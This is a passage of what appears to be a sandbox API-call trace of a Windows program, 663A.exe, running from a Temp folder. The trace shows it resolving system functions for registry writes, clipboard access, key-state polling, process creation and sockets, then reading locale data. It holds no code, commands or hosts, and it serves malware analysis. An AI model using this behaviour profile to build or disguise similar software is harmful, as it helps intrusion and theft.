0x769c17b1 [0131.527] GetProcAddress (hModule=0x769b0000, lpProcName="SetEndOfFile") returned 0x769dce06 [0131.527] GetProcAddress (hModule=0x769b0000, lpProcName="RtlUnwind") returned 0x769ed1b3 [0131.527] GetProcAddress (hModule=0x769b0000, lpProcName="ReadFile") returned 0x769c3e83 [0131.528] GetProcAddress (hModule=0x769b0000, lpProcName="RaiseException") returned 0x769c585e [0131.528] GetProcAddress (hModule=0x769b0000, lpProcName="GetStdHandle") returned 0x769c516b [0131.528] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileSize") returned 0x769c194e [0131.528] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTime") returned 0x769c5a4e [0131.528] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileType") returned 0x769c34e1 [0131.528] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0131.528] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0131.528] GetModuleHandleA (lpModuleName="user32.dll") returned 0x773b0000 [0131.528] GetProcAddress (hModule=0x773b0000, lpProcName="GetKeyboardType") returned 0x77409ac4 [0131.529] GetProcAddress (hModule=0x773b0000, lpProcName="LoadStringA") returned 0x773cdb21 [0131.529] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0131.529] GetProcAddress (hModule=0x773b0000, lpProcName="CharNextA") returned 0x773c7a1b [0131.529] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76c20000 [0131.529] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryValueExA") returned 0x76c348ef [0131.529] GetProcAddress (hModule=0x76c20000, lpProcName="RegOpenKeyExA") returned 0x76c34907 [0131.529] GetProcAddress (hModule=0x76c20000, lpProcName="RegCloseKey") returned 0x76c3469d [0131.530] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x757f0000 [0131.530] GetProcAddress (hModule=0x757f0000, lpProcName="VariantChangeTypeEx") returned 0x757f4c28 [0131.530] GetProcAddress (hModule=0x757f0000, lpProcName="VariantCopyInd") returned 0x7580e86c [0131.530] GetProcAddress (hModule=0x757f0000, lpProcName="VariantClear") returned 0x757f3eae [0131.530] GetProcAddress (hModule=0x757f0000, lpProcName="SysStringLen") returned 0x757f4680 [0131.530] GetProcAddress (hModule=0x757f0000, lpProcName="SysFreeString") returned 0x757f3e59 [0131.530] GetProcAddress (hModule=0x757f0000, lpProcName="SysReAllocStringLen") returned 0x757f7810 [0131.530] GetProcAddress (hModule=0x757f0000, lpProcName="SysAllocStringLen") returned 0x757f45d2 [0131.530] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0131.530] GetProcAddress (hModule=0x769b0000, lpProcName="TlsSetValue") returned 0x769c14db [0131.531] GetProcAddress (hModule=0x769b0000, lpProcName="TlsGetValue") returned 0x769c11e0 [0131.531] GetProcAddress (hModule=0x769b0000, lpProcName="TlsFree") returned 0x769c3537 [0131.531] GetProcAddress (hModule=0x769b0000, lpProcName="TlsAlloc") returned 0x769c4965 [0131.531] GetProcAddress (hModule=0x769b0000, lpProcName="LocalFree") returned 0x769c2cec [0131.531] GetProcAddress (hModule=0x769b0000, lpProcName="LocalAlloc") returned 0x769c166c [0131.531] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0131.531] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76c20000 [0131.531] GetProcAddress (hModule=0x76c20000, lpProcName="RegSetValueExA") returned 0x76c314b3 [0131.531] GetProcAddress (hModule=0x76c20000, lpProcName="RegSetValueA") returned 0x76c80e41 [0131.531] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryValueExA") returned 0x76c348ef [0131.532] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryInfoKeyA") returned 0x76c2e143 [0131.532] GetProcAddress (hModule=0x76c20000, lpProcName="RegOpenKeyExA") returned 0x76c34907 [0131.532] GetProcAddress (hModule=0x76c20000, lpProcName="RegEnumKeyExA") returned 0x76c31481 [0131.532] GetProcAddress (hModule=0x76c20000, lpProcName="RegCreateKeyExA") returned 0x76c31469 [0131.532] GetProcAddress (hModule=0x76c20000, lpProcName="RegCloseKey") returned 0x76c3469d [0131.580] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0131.581] GetProcAddress (hModule=0x769b0000, lpProcName="WritePrivateProfileStringA") returned 0x769e7018 [0131.581] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0131.581] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForSingleObject") returned 0x769c1136 [0131.581] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualUnlock") returned 0x769def11 [0131.581] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualQuery") returned 0x769c4412 [0131.581] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualLock") returned 0x769dec0b [0131.581] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0131.581] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0131.581] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0131.582] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadPriority") returned 0x769c326b [0131.582] GetProcAddress (hModule=0x769b0000, lpProcName="SetFilePointer") returned 0x769c17b1 [0131.582] GetProcAddress (hModule=0x769b0000, lpProcName="SetFileAttributesA") returned 0x769deca3 [0131.582] GetProcAddress (hModule=0x769b0000, lpProcName="SetEndOfFile") returned 0x769dce06 [0131.582] GetProcAddress (hModule=0x769b0000, lpProcName="RemoveDirectoryA") returned 0x76a44a5f [0131.582] GetProcAddress (hModule=0x769b0000, lpProcName="ReadFile") returned 0x769c3e83 [0131.582] GetProcAddress (hModule=0x769b0000, lpProcName="QueryPerformanceFrequency") returned 0x769c41a8 [0131.582] GetProcAddress (hModule=0x769b0000, lpProcName="QueryPerformanceCounter") returned 0x769c1705 [0131.582] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryA") returned 0x769c498f [0131.582] GetProcAddress (hModule=0x769b0000, lpProcName="LeaveCriticalSection") returned 0x77a02270 [0131.583] GetProcAddress (hModule=0x769b0000, lpProcName="IsBadReadPtr") returned 0x769ed065 [0131.583] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSection") returned 0x77a12c42 [0131.583] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalUnlock") returned 0x769dcfb4 [0131.583] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalHandle") returned 0x769ed26c [0131.583] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalLock") returned 0x769dd077 [0131.583] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalFree") returned 0x769c5510 [0131.583] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalAlloc") returned 0x769c5846 [0131.584] GetProcAddress (hModule=0x769b0000, lpProcName="GetWindowsDirectoryA") returned 0x769e2ada [0131.584] GetProcAddress (hModule=0x769b0000, lpProcName="GetVolumeInformationA") returned 0x769e6d9b [0131.584] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersionExA") returned 0x769c34c9 [0131.584] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersion") returned 0x769c441f [0131.584] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadPriority") returned 0x769c4377 [0131.584] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadLocale") returned 0x769c357f [0131.584] GetProcAddress (hModule=0x769b0000, lpProcName="GetTempPathA") returned 0x769e273c [0131.584] GetProcAddress (hModule=0x769b0000, lpProcName="GetTempFileNameA") returned 0x769e9d0f [0131.585] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemInfo") returned 0x769c4982 [0131.585] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0131.585] GetProcAddress (hModule=0x769b0000, lpProcName="GetPrivateProfileStringA") returned 0x769d1804 [0131.585] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0131.585] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0131.585] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoA") returned 0x769dd5b5 [0131.585] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocalTime") returned 0x769c5a5e [0131.585] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0131.585] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileSize") returned 0x769c194e [0131.586] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileAttributesA") returned 0x769c53cc [0131.586] GetProcAddress (hModule=0x769b0000, lpProcName="GetExitCodeProcess") returned 0x769d1705 [0131.586] GetProcAddress (hModule=0x769b0000, lpProcName="GetDriveTypeA") returned 0x769def45 [0131.586] GetProcAddress (hModule=0x769b0000, lpProcName="GetDiskFreeSpaceA") returned 0x76a448df [0131.586] GetProcAddress (hModule=0x769b0000, lpProcName="GetDateFormatA") returned 0x769ea939 [0131.586] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThreadId") returned 0x769c1430 [0131.586] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThread") returned 0x769c17cc [0131.586] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcess") returned 0x769c17e9 [0131.586] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentDirectoryA") returned 0x769ed4e6 [0131.586] GetProcAddress (hModule=0x769b0000, lpProcName="GetCPInfo") returned 0x769c5141 [0131.587] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0131.587] GetProcAddress (hModule=0x769b0000, lpProcName="FormatMessageA") returned 0x769e5f8d [0131.587] GetProcAddress (hModule=0x769b0000, lpProcName="FindNextFileA") returned 0x769ed52e [0131.587] GetProcAddress (hModule=0x769b0000, lpProcName="FindFirstFileA") returned 0x769ce286 [0131.587] GetProcAddress (hModule=0x769b0000, lpProcName="FindClose") returned 0x769c43fa [0131.587] GetProcAddress (hModule=0x769b0000, lpProcName="FileTimeToLocalFileTime") returned 0x769ce256 [0131.587] GetProcAddress (hModule=0x769b0000, lpProcName="FileTimeToDosDateTime") returned 0x769dc845 [0131.587] GetProcAddress (hModule=0x769b0000, lpProcName="ExpandEnvironmentStringsA") returned 0x769deb09 [0131.587] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0131.587] GetProcAddress (hModule=0x769b0000, lpProcName="EnumCalendarInfoA") returned 0x769e9e40 [0131.588] GetProcAddress (hModule=0x769b0000, lpProcName="EnterCriticalSection") returned 0x77a022b0 [0131.588] GetProcAddress (hModule=0x769b0000, lpProcName="DeviceIoControl") returned 0x769c31df [0131.588] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteFileA") returned 0x769c53fc [0131.588] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteCriticalSection") returned 0x77a145f5 [0131.588] GetProcAddress (hModule=0x769b0000, lpProcName="CreateProcessA") returned 0x769c1072 [0131.588] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0131.588] GetProcAddress (hModule=0x769b0000, lpProcName="CreateEventA") returned 0x769c323c [0131.588] GetProcAddress (hModule=0x769b0000, lpProcName="CreateDirectoryA") returned 0x769ed516 [0131.588] GetProcAddress (hModule=0x769b0000, lpProcName="CopyFileA") returned 0x769e58b5 [0131.589] GetProcAddress (hModule=0x769b0000, lpProcName="CompareStringA") returned 0x769c3c0a [0131.589] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0131.589] GetModuleHandleA (lpModuleName="version.dll") returned 0x0 [0131.589] LoadLibraryA (lpLibFileName="version.dll") returned 0x74520000 [0131.914] GetProcAddress (hModule=0x74520000, lpProcName="VerQueryValueA") returned 0x74521b72 [0131.914] GetProcAddress (hModule=0x74520000, lpProcName="GetFileVersionInfoSizeA") returned 0x74521c9c [0131.914] GetProcAddress (hModule=0x74520000, lpProcName="GetFileVersionInfoA") returned 0x74521ced [0131.914] GetModuleHandleA (lpModuleName="gdi32.dll") returned 0x77240000 [0131.914] GetProcAddress (hModule=0x77240000, lpProcName="SetBkMode") returned 0x772551a2 [0131.914] GetProcAddress (hModule=0x77240000, lpProcName="GetStockObject") returned 0x77254eb8 [0131.914] GetProcAddress (hModule=0x77240000, lpProcName="CreateFontA") returned 0x7725d0e8 [0131.915] GetProcAddress (hModule=0x77240000, lpProcName="CreateDIBitmap") returned 0x77257217 [0131.915] GetModuleHandleA (lpModuleName="user32.dll") returned 0x773b0000 [0131.915] GetProcAddress (hModule=0x773b0000, lpProcName="TranslateMessage") returned 0x773c7809 [0131.915] GetProcAddress (hModule=0x773b0000, lpProcName="ShowWindow") returned 0x773d0dfb [0131.915] GetProcAddress (hModule=0x773b0000, lpProcName="SetWindowTextA") returned 0x773d7aee [0131.915] GetProcAddress (hModule=0x773b0000, lpProcName="SetWindowPos") returned 0x773c8e4e [0131.915] GetProcAddress (hModule=0x773b0000, lpProcName="SetFocus") returned 0x773d2175 [0131.915] GetProcAddress (hModule=0x773b0000, lpProcName="SetDlgItemTextA") returned 0x773dc4d6 [0131.915] GetProcAddress (hModule=0x773b0000, lpProcName="SetClipboardData") returned 0x77408e57 [0131.915] GetProcAddress (hModule=0x773b0000, lpProcName="SendMessageA") returned 0x773d612e [0131.916] GetProcAddress (hModule=0x773b0000, lpProcName="SendDlgItemMessageA") returned 0x773ec112 [0131.916] GetProcAddress (hModule=0x773b0000, lpProcName="RegisterClassA") returned 0x773d434b [0131.916] GetProcAddress (hModule=0x773b0000, lpProcName="PostQuitMessage") returned 0x773c9abb [0131.916] GetProcAddress (hModule=0x773b0000, lpProcName="PeekMessageA") returned 0x773d5f74 [0131.916] GetProcAddress (hModule=0x773b0000, lpProcName="OpenClipboard") returned 0x773d8ecb [0131.916] GetProcAddress (hModule=0x773b0000, lpProcName="MsgWaitForMultipleObjects") returned 0x773d0b4a [0131.916] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0131.916] GetProcAddress (hModule=0x773b0000, lpProcName="LoadStringA") returned 0x773cdb21 [0131.916] GetProcAddress (hModule=0x773b0000, lpProcName="LoadIconA") returned 0x773cdafb [0131.916] GetProcAddress (hModule=0x773b0000, lpProcName="LoadCursorA") returned 0x773cdad5 [0131.917] GetProcAddress (hModule=0x773b0000, lpProcName="IsClipboardFormatAvailable") returned 0x773d8676 [0131.917] GetProcAddress (hModule=0x773b0000, lpProcName="GetWindowTextA") returned 0x773d0029 [0131.917] GetProcAddress (hModule=0x773b0000, lpProcName="GetWindowRect") returned 0x773c7f34 [0131.917] GetProcAddress (hModule=0x773b0000, lpProcName="GetSystemMetrics") returned 0x773c7d2f [0131.917] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageA") returned 0x773c7bd3 [0131.917] GetProcAddress (hModule=0x773b0000, lpProcName="GetFocus") returned 0x773d0dee [0131.917] GetProcAddress (hModule=0x773b0000, lpProcName="GetDlgItemTextA") returned 0x77426b36 [0131.917] GetProcAddress (hModule=0x773b0000, lpProcName="GetDlgItem") returned 0x773ef1ba [0131.917] GetProcAddress (hModule=0x773b0000, lpProcName="GetDesktopWindow") returned 0x773d0a19 [0131.917] GetProcAddress (hModule=0x773b0000, lpProcName="GetDC") returned 0x773c72c4 [0131.918] GetProcAddress (hModule=0x773b0000, lpProcName="GetAsyncKeyState") returned 0x773eeb96 [0131.918] GetProcAddress (hModule=0x773b0000, lpProcName="GetActiveWindow") returned 0x773ef5c7 [0131.918] GetProcAddress (hModule=0x773b0000, lpProcName="EndDialog") returned 0x773eb99c [0131.918] GetProcAddress (hModule=0x773b0000, lpProcName="EnableWindow") returned 0x773d2da4 [0131.918] GetProcAddress (hModule=0x773b0000, lpProcName="EmptyClipboard") returned 0x77427cb9 [0131.918] GetProcAddress (hModule=0x773b0000, lpProcName="DispatchMessageA") returned 0x773c7bbb [0131.918] GetProcAddress (hModule=0x773b0000, lpProcName="DialogBoxIndirectParamA") returned 0x7740ce64 [0131.918] GetProcAddress (hModule=0x773b0000, lpProcName="DestroyWindow") returned 0x773c9a55 [0131.918] GetProcAddress (hModule=0x773b0000, lpProcName="DefWindowProcA") returned 0x77a224e0 [0131.918] GetProcAddress (hModule=0x773b0000, lpProcName="CreateWindowExA") returned 0x773cd22e [0131.919] GetProcAddress (hModule=0x773b0000, lpProcName="CloseClipboard") returned 0x773d8e8d [0131.919] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76e80000 [0131.919] GetProcAddress (hModule=0x76e80000, lpProcName="CoCreateGuid") returned 0x76ec15d5 [0131.919] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0131.919] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersionExA") returned 0x769c34c9 [0131.919] GetModuleHandleA (lpModuleName="wsock32.dll") returned 0x0 [0131.919] LoadLibraryA (lpLibFileName="wsock32.dll") returned 0x75400000 [0132.995] GetProcAddress (hModule=0x75400000, lpProcName="ioctlsocket") returned 0x75613084 [0132.995] GetProcAddress (hModule=0x75400000, lpProcName="WSACancelBlockingCall") returned 0x75625343 [0132.995] GetProcAddress (hModule=0x75400000, lpProcName="WSAIsBlocking") returned 0x756253be [0132.995] GetProcAddress (hModule=0x75400000, lpProcName="gethostbyname") returned 0x75627673 [0132.995] GetProcAddress (hModule=0x75400000, lpProcName="send") returned 0x75616f01 [0132.995] GetProcAddress (hModule=0x75400000, lpProcName="recv") returned 0x754017a8 [0132.995] GetProcAddress (hModule=0x75400000, lpProcName="connect") returned 0x75616bdd [0132.995] GetProcAddress (hModule=0x75400000, lpProcName="WSACleanup") returned 0x75613c5f [0132.996] GetProcAddress (hModule=0x75400000, lpProcName="closesocket") returned 0x75613918 [0132.996] GetProcAddress (hModule=0x75400000, lpProcName="shutdown") returned 0x7561449d [0132.996] GetProcAddress (hModule=0x75400000, lpProcName="socket") returned 0x75613eb8 [0132.996] GetProcAddress (hModule=0x75400000, lpProcName="WSAStartup") returned 0x75613ab2 [0133.010] GetModuleFileNameA (in: hModule=0x2130000, lpFilename=0x18fde8, nSize=0x105 | out: lpFilename="\n" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\\n")) returned 0x0 [0133.056] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fcc3, nSize=0x105 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\663a.exe")) returned 0x2d [0133.057] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18fdd8 | out: phkResult=0x18fdd8*=0x0) returned 0x2 [0133.057] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18fdd8 | out: phkResult=0x18fdd8*=0x0) returned 0x2 [0133.057] lstrcpyA (in: lpString1=0x18fcc3, lpString2="\n" | out: lpString1="\n") returned="\n" [0133.057] GetThreadLocale () returned 0x409 [0133.057] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18fdd3, cchData=5 | out: lpLCData="ENU") returned 4 [0133.060] lstrlenA (lpString="\n") returned 1 [0133.071] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x264358 [0133.079] GetKeyboardType (nTypeFlag=0) returned 4 [0133.079] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe" [0133.079] GetStartupInfoA (in: lpStartupInfo=0x18fe78 | out: lpStartupInfo=0x18fe78*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0133.079] GetCurrentThreadId () returned 0xeb8 [0133.088] LoadStringA (in: hInstance=0x2130000, uID=0xffdc, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.088] LoadStringA (in: hInstance=0x2130000, uID=0xffdb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.088] LoadStringA (in: hInstance=0x2130000, uID=0xffd9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.088] LoadStringA (in: hInstance=0x2130000, uID=0xffda, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.088] LoadStringA (in: hInstance=0x2130000, uID=0xffd8, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.088] LoadStringA (in: hInstance=0x2130000, uID=0xffd7, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.088] LoadStringA (in: hInstance=0x2130000, uID=0xffd6, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffd3, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffd2, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffd1, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffea, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffeb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffec, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffe9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffe8, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffe6, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffe5, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffe4, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffe3, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffe2, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffe1, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffe0, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xffff, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xfffe, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xfffd, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xfffc, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xfffb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xfffa, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.089] LoadStringA (in: hInstance=0x2130000, uID=0xfff9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.097] LoadStringA (in: hInstance=0x2130000, uID=0xfff7, lpBuffer=0x18fa9c, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.097] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x264aa8 [0133.098] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2190000 [0133.099] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x265aa8 [0133.099] VirtualAlloc (lpAddress=0x2190000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2190000 [0133.099] LoadStringA (in: hInstance=0x2130000, uID=0xffe7, lpBuffer=0x18fa9c, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0133.107] GetThreadLocale () returned 0x409 [0133.107] GetSystemMetrics (nIndex=74) returned 0 [0133.121] GetSystemMetrics (nIndex=42) returned 0 [0133.149] GetThreadLocale () returned 0x409 [0133.149] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jan") returned 4 [0133.149] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd04, cchData=256 | out: lpLCData="January") returned 8 [0133.149] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Feb") returned 4 [0133.149] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd04, cchData=256 | out: lpLCData="February") returned 9 [0133.149] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Mar") returned 4 [0133.149] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="March") returned 6 [0133.149] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Apr") returned 4 [0133.149] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="April") returned 6 [0133.149] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd04, cchData=256 | out: lpLCData="May") returned 4 [0133.149] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="May") returned 4 [0133.149] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jun") returned 4 [0133.149] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="June") returned 5 [0133.150] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jul") returned 4 [0133.150] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="July") returned 5 [0133.150] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Aug") returned 4 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="August") returned 7 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sep") returned 4 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd04, cchData=256 | out: lpLCData="September") returned 10 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Oct") returned 4 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd04, cchData=256 | out: lpLCData="October") returned 8 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Nov") returned 4 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd04, cchData=256 | out: lpLCData="November") returned 9 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Dec") returned 4 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd04, cchData=256 | out: lpLCData="December") returned 9 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sun") returned 4 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sunday") returned 7 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Mon") returned 4 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Monday") returned 7 [0133.151] 